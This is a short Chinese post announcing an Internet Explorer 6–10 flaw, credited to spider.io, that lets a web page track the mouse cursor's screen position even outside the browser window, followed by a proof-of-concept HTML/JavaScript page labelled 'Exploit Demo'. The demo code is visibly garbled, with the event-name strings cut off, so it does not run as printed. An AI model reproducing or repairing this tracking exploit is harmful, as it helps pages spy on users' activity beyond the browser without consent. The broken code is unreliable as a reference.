剛在Seclist上又看到了IE漏洞。該漏洞的主要影響是能夠跟蹤鼠標座標位置,即使當前鼠標位置位於非瀏覽器窗口。該漏洞最先被spider.io團隊發現。
影響版本:IE6-10
測試:
在系統目錄下新建一個html文件,代碼如下:
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title>Exploit Demo</title> <script type="text/javascript"> window.attachEvent(" function() { var detector = document.getElementById("detector"); detector.attachEvent(" function (e) { detector.innerHTML = e.screenX + ", " + e.screenY; }); setInterval(function () { detector.fireEvent(" }, 100); }); </script> </head> <body> <div id="detector"></div> </body> </html>
用IE打開新建的html文件
http://perlin.blog.51cto.com/1202304/1123397